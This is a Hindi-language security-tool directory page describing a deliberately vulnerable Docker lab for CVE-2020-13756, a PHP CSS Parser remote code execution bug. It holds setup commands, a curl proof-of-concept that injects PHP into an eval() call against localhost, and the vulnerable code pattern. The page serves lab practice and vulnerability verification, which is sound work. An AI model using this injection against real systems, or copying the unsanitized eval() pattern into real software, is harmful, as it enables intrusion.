Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-13756-env — CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) के लिए कमजोर परीक्षण वातावरण | Kitploit
उपकरण/GitHubGitHub/kre80r/cve-2020-13756-env
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) के लिए कमजोर परीक्षण वातावरण

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-13756 असुरक्षित वातावरण

असुरक्षित परीक्षण वातावरण CVE-2020-13756 - Sabberworm PHP CSS Parser रिमोट कोड निष्पादन के लिए।

भेद्यता विवरण

फ़ील्डमान
CVECVE-2020-13756
उत्पादSabberworm PHP CSS Parser
असुरक्षित संस्करण< 8.3.1
गंभीरतागंभीर (CVSS 9.8)
प्रकाररिमोट कोड निष्पादन

त्वरित आरंभ (एक-पंक्ति)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

या क्लोन करें और चलाएं:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

मैन्युअल सेटअप

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

भेद्यता सत्यापित करें

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

अपेक्षित आउटपुट में शुरुआत में VULN_TEST शामिल है, जो कोड निष्पादन को सिद्ध करता है।

Nuclei के साथ परीक्षण

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

तकनीकी विवरण

यह भेद्यता getSelectorsBySpecificity() फ़ंक्शन में मौजूद है जो अस्वच्छित उपयोगकर्ता इनपुट को eval() में पास करता है:

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

संदर्भ

  • NVD
  • Fix Commit
  • Full Disclosure
  • PacketStorm

अस्वीकरण

यह वातावरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

लेखक

KrE80r - सुरक्षा अनुसंधान

टूल डाउनलोड करें